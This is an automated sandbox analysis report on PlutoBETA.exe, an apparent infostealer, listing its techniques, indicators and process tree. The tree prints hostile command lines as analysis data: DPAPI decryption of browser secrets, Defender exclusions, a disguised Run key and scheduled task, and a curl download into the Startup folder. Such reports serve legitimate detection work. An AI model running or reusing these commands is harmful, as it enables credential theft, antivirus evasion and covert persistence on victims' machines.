52ec41e428b630194915d3f5e1016e58147c7ae3202cdd1c6d6a4d20c76ea0b5

Analysis

max time kernel
135s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
17-05-2024 16:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PlutoBETA.2/PlutoBETA.exe
Size

37.6MB
MD5

529f707d764d2da27d2b8f982e5c3c37
SHA1

e4ab7395a54777c310259b975e6ccbd1cc934d37
SHA256

90473bef6e0137f9d543260dec681ee7ce0f0e833f4084b4d427c1fea3f49045
SHA512

67e551b165f02fabd406afaa5a88cf75aa69cec689b544d41d093656783828236813102cbab8d8868457eec070039d381fe544c9215d07f66730fe4e97ceef63
SSDEEP

393216:JQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgh96l+ZArYsFRl7du:J3on1HvSzxAMNhFZArYsSPvp7OZuF

Score

8^/10

execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

412 powershell.exe
4652 powershell.exe
1020 powershell.exe
3856 powershell.exe
1184 powershell.exe

pid	process
412	powershell.exe
4652	powershell.exe
1020	powershell.exe
3856	powershell.exe
1184	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

PlutoBETA.execscript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	PlutoBETA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation	cscript.exe

Loads dropped DLL 1 IoCs

Processes:

PlutoBETA.exe

pid process

5096 PlutoBETA.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
5096	PlutoBETA.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\NlBifCdGDIxZOcn.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\PlutoBETA.2\\PlutoBETA.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

61 discord.com
18 discord.com
24 discord.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 api.ipify.org
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

Processes:

cmd.execmd.exe

pid process

5004 cmd.exe
448 cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2504 schtasks.exe
Detects videocard installed 1 TTPs 9 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exe

pid process

4608 WMIC.exe
4136 WMIC.exe
1452 WMIC.exe
4996 WMIC.exe
1748 WMIC.exe
1720 WMIC.exe
1520 WMIC.exe
1480 WMIC.exe
4652 WMIC.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

1160 tasklist.exe
3628 tasklist.exe
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

4564 reg.exe
516 reg.exe

flow	ioc
61	discord.com
18	discord.com
24	discord.com

flow	ioc
16	api.ipify.org

pid	process
5004	cmd.exe
448	cmd.exe

pid	process
2504	schtasks.exe

pid	process
4608	WMIC.exe
4136	WMIC.exe
1452	WMIC.exe
4996	WMIC.exe
1748	WMIC.exe
1720	WMIC.exe
1520	WMIC.exe
1480	WMIC.exe
4652	WMIC.exe

pid	process
1160	tasklist.exe
3628	tasklist.exe

pid	process
4564	reg.exe
516	reg.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exePlutoBETA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3856	powershell.exe
3856	powershell.exe
3544	powershell.exe
3544	powershell.exe
1560	powershell.exe
1560	powershell.exe
412	powershell.exe
412	powershell.exe
412	powershell.exe
4652	powershell.exe
4652	powershell.exe
4652	powershell.exe
3580	powershell.exe
3580	powershell.exe
3580	powershell.exe
1020	powershell.exe
1020	powershell.exe
1020	powershell.exe
4952	powershell.exe
4952	powershell.exe
4952	powershell.exe
3548	powershell.exe
3548	powershell.exe
3548	powershell.exe
908	powershell.exe
908	powershell.exe
908	powershell.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
5096	PlutoBETA.exe
5096	PlutoBETA.exe
5096	PlutoBETA.exe
1976	powershell.exe
1976	powershell.exe
1976	powershell.exe
4308	powershell.exe
4308	powershell.exe
4308	powershell.exe
636	powershell.exe
636	powershell.exe
636	powershell.exe
1900	powershell.exe
1900	powershell.exe
1900	powershell.exe
1088	powershell.exe
1088	powershell.exe
1088	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3856	powershell.exe
Token: SeDebugPrivilege	1160	tasklist.exe
Token: SeDebugPrivilege	3628	tasklist.exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeDebugPrivilege	1560	powershell.exe
Token: SeIncreaseQuotaPrivilege	8	WMIC.exe
Token: SeSecurityPrivilege	8	WMIC.exe
Token: SeTakeOwnershipPrivilege	8	WMIC.exe
Token: SeLoadDriverPrivilege	8	WMIC.exe
Token: SeSystemProfilePrivilege	8	WMIC.exe
Token: SeSystemtimePrivilege	8	WMIC.exe
Token: SeProfSingleProcessPrivilege	8	WMIC.exe
Token: SeIncBasePriorityPrivilege	8	WMIC.exe
Token: SeCreatePagefilePrivilege	8	WMIC.exe
Token: SeBackupPrivilege	8	WMIC.exe
Token: SeRestorePrivilege	8	WMIC.exe
Token: SeShutdownPrivilege	8	WMIC.exe
Token: SeDebugPrivilege	8	WMIC.exe
Token: SeSystemEnvironmentPrivilege	8	WMIC.exe
Token: SeRemoteShutdownPrivilege	8	WMIC.exe
Token: SeUndockPrivilege	8	WMIC.exe
Token: SeManageVolumePrivilege	8	WMIC.exe
Token: 33	8	WMIC.exe
Token: 34	8	WMIC.exe
Token: 35	8	WMIC.exe
Token: 36	8	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2876	WMIC.exe
Token: SeSecurityPrivilege	2876	WMIC.exe
Token: SeTakeOwnershipPrivilege	2876	WMIC.exe
Token: SeLoadDriverPrivilege	2876	WMIC.exe
Token: SeSystemProfilePrivilege	2876	WMIC.exe
Token: SeSystemtimePrivilege	2876	WMIC.exe
Token: SeProfSingleProcessPrivilege	2876	WMIC.exe
Token: SeIncBasePriorityPrivilege	2876	WMIC.exe
Token: SeCreatePagefilePrivilege	2876	WMIC.exe
Token: SeBackupPrivilege	2876	WMIC.exe
Token: SeRestorePrivilege	2876	WMIC.exe
Token: SeShutdownPrivilege	2876	WMIC.exe
Token: SeDebugPrivilege	2876	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2876	WMIC.exe
Token: SeRemoteShutdownPrivilege	2876	WMIC.exe
Token: SeUndockPrivilege	2876	WMIC.exe
Token: SeManageVolumePrivilege	2876	WMIC.exe
Token: 33	2876	WMIC.exe
Token: 34	2876	WMIC.exe
Token: 35	2876	WMIC.exe
Token: 36	2876	WMIC.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeIncreaseQuotaPrivilege	8	WMIC.exe
Token: SeSecurityPrivilege	8	WMIC.exe
Token: SeTakeOwnershipPrivilege	8	WMIC.exe
Token: SeLoadDriverPrivilege	8	WMIC.exe
Token: SeSystemProfilePrivilege	8	WMIC.exe
Token: SeSystemtimePrivilege	8	WMIC.exe
Token: SeProfSingleProcessPrivilege	8	WMIC.exe
Token: SeIncBasePriorityPrivilege	8	WMIC.exe
Token: SeCreatePagefilePrivilege	8	WMIC.exe
Token: SeBackupPrivilege	8	WMIC.exe
Token: SeRestorePrivilege	8	WMIC.exe
Token: SeShutdownPrivilege	8	WMIC.exe
Token: SeDebugPrivilege	8	WMIC.exe
Token: SeSystemEnvironmentPrivilege	8	WMIC.exe
Token: SeRemoteShutdownPrivilege	8	WMIC.exe
Token: SeUndockPrivilege	8	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

PlutoBETA.execmd.exepowershell.execsc.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 5096 wrote to memory of 2356	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 2356	5096	PlutoBETA.exe	cmd.exe
PID 2356 wrote to memory of 2896	2356	cmd.exe	cmd.exe
PID 2356 wrote to memory of 2896	2356	cmd.exe	cmd.exe
PID 2356 wrote to memory of 3856	2356	cmd.exe	powershell.exe
PID 2356 wrote to memory of 3856	2356	cmd.exe	powershell.exe
PID 3856 wrote to memory of 4480	3856	powershell.exe	csc.exe
PID 3856 wrote to memory of 4480	3856	powershell.exe	csc.exe
PID 4480 wrote to memory of 2308	4480	csc.exe	cvtres.exe
PID 4480 wrote to memory of 2308	4480	csc.exe	cvtres.exe
PID 5096 wrote to memory of 1144	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 1144	5096	PlutoBETA.exe	cmd.exe
PID 1144 wrote to memory of 2516	1144	cmd.exe	curl.exe
PID 1144 wrote to memory of 2516	1144	cmd.exe	curl.exe
PID 5096 wrote to memory of 4704	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 4704	5096	PlutoBETA.exe	cmd.exe
PID 4704 wrote to memory of 1160	4704	cmd.exe	cmd.exe
PID 4704 wrote to memory of 1160	4704	cmd.exe	cmd.exe
PID 5096 wrote to memory of 3336	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 3336	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 5004	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 5004	5096	PlutoBETA.exe	cmd.exe
PID 3336 wrote to memory of 3628	3336	cmd.exe	curl.exe
PID 3336 wrote to memory of 3628	3336	cmd.exe	curl.exe
PID 5004 wrote to memory of 3544	5004	cmd.exe	cmd.exe
PID 5004 wrote to memory of 3544	5004	cmd.exe	cmd.exe
PID 5096 wrote to memory of 448	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 448	5096	PlutoBETA.exe	cmd.exe
PID 448 wrote to memory of 1560	448	cmd.exe	powershell.exe
PID 448 wrote to memory of 1560	448	cmd.exe	powershell.exe
PID 5096 wrote to memory of 4468	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 4468	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 1548	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 1548	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 888	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 888	5096	PlutoBETA.exe	cmd.exe
PID 1548 wrote to memory of 4420	1548	cmd.exe	reg.exe
PID 1548 wrote to memory of 4420	1548	cmd.exe	reg.exe
PID 4468 wrote to memory of 8	4468	cmd.exe	WMIC.exe
PID 4468 wrote to memory of 8	4468	cmd.exe	WMIC.exe
PID 888 wrote to memory of 2504	888	cmd.exe	schtasks.exe
PID 888 wrote to memory of 2504	888	cmd.exe	schtasks.exe
PID 5096 wrote to memory of 1648	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 1648	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 1124	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 1124	5096	PlutoBETA.exe	cmd.exe
PID 1648 wrote to memory of 412	1648	cmd.exe	powershell.exe
PID 1648 wrote to memory of 412	1648	cmd.exe	powershell.exe
PID 1124 wrote to memory of 2876	1124	cmd.exe	WMIC.exe
PID 1124 wrote to memory of 2876	1124	cmd.exe	WMIC.exe
PID 5096 wrote to memory of 2228	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 2228	5096	PlutoBETA.exe	cmd.exe
PID 2228 wrote to memory of 4500	2228	cmd.exe	cscript.exe
PID 2228 wrote to memory of 4500	2228	cmd.exe	cscript.exe
PID 5096 wrote to memory of 2148	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 2148	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 4716	5096	PlutoBETA.exe	cmd.exe
PID 5096 wrote to memory of 4716	5096	PlutoBETA.exe	cmd.exe
PID 2148 wrote to memory of 1356	2148	cmd.exe	getmac.exe
PID 2148 wrote to memory of 1356	2148	cmd.exe	getmac.exe
PID 2148 wrote to memory of 552	2148	cmd.exe	curl.exe
PID 2148 wrote to memory of 552	2148	cmd.exe	curl.exe
PID 4716 wrote to memory of 5076	4716	cmd.exe	WMIC.exe
PID 4716 wrote to memory of 5076	4716	cmd.exe	WMIC.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe
"C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
2⤵
- Suspicious use of WriteProcessMemory
PID:2356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
3⤵
PID:2896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -noprofile -
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i53hqiit\i53hqiit.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4480

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B90.tmp" "c:\Users\Admin\AppData\Local\Temp\i53hqiit\CSC8FE626724B4E4E649BEE592F2449BE9.TMP"
5⤵
PID:2308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
- Suspicious use of WriteProcessMemory
PID:1144

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:4704

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:3336

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:5004

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,103,196,233,202,173,72,72,111,7,114,28,211,134,137,138,195,205,140,24,52,98,3,53,175,108,94,233,109,120,13,191,242,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,253,164,105,22,43,133,116,221,247,237,98,114,58,232,68,141,195,104,11,211,142,38,107,135,14,111,162,45,53,235,31,47,48,0,0,0,139,129,220,128,239,193,169,178,87,248,198,148,105,101,8,160,179,42,9,89,217,234,203,86,195,57,172,165,43,228,26,244,208,40,230,36,7,44,174,141,191,53,41,170,221,213,229,5,64,0,0,0,198,79,68,77,86,136,101,82,59,161,186,12,144,63,199,97,136,128,241,73,129,107,45,134,96,189,169,77,167,179,78,57,191,71,192,110,77,78,200,202,72,215,75,168,16,28,54,110,129,153,155,136,70,130,53,219,254,80,11,199,4,34,251,178), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,109,211,117,219,116,17,4,75,135,49,110,122,19,80,22,166,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,2,79,85,4,150,205,10,80,53,167,214,6,202,8,125,236,233,236,218,25,253,12,145,187,174,237,139,110,182,74,179,216,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,154,21,59,141,97,3,114,168,133,83,221,83,89,36,173,229,203,138,215,206,161,182,195,227,173,232,148,189,209,104,127,202,48,0,0,0,3,96,151,243,80,230,3,128,202,108,106,90,64,104,85,51,109,94,27,191,48,86,84,213,77,136,7,79,223,4,40,79,96,18,102,94,125,131,10,49,97,43,139,78,29,195,162,171,64,0,0,0,239,70,100,246,136,204,183,200,225,215,165,10,64,212,176,59,73,238,67,52,219,250,12,222,213,64,193,91,107,135,105,94,226,33,5,92,118,249,43,50,182,208,86,0,153,253,66,70,103,128,73,177,145,140,88,106,193,154,38,168,189,109,25,6), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:8

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
3⤵
PID:4420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
2⤵
- Suspicious use of WriteProcessMemory
PID:888

C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
3⤵
- Creates scheduled task(s)
PID:2504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
2⤵
- Suspicious use of WriteProcessMemory
PID:1648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:412

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\apzshero\apzshero.cmdline"
4⤵
PID:1568

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES515C.tmp" "c:\Users\Admin\AppData\Local\Temp\apzshero\CSCBB371280E72A42ACA82997606E30A2BE.TMP"
5⤵
PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
2⤵
- Suspicious use of WriteProcessMemory
PID:2228

C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
3⤵
- Checks computer location settings
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
4⤵
PID:2396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4652

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1020

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
5⤵
- Adds Run key to start application
- Modifies registry key
PID:4564

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
5⤵
- Modifies registry key
PID:516

C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
5⤵
PID:552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
- Suspicious use of WriteProcessMemory
PID:2148

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1356

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:4716

C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
3⤵
PID:5076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:1188

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4608

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
2⤵
PID:2244

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
3⤵
PID:3460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
2⤵
PID:3544

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
3⤵
PID:3368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:2492

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:3628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
2⤵
PID:3336

C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
3⤵
PID:1060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
2⤵
PID:4544

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:1208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
2⤵
PID:4468

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
3⤵
PID:2896

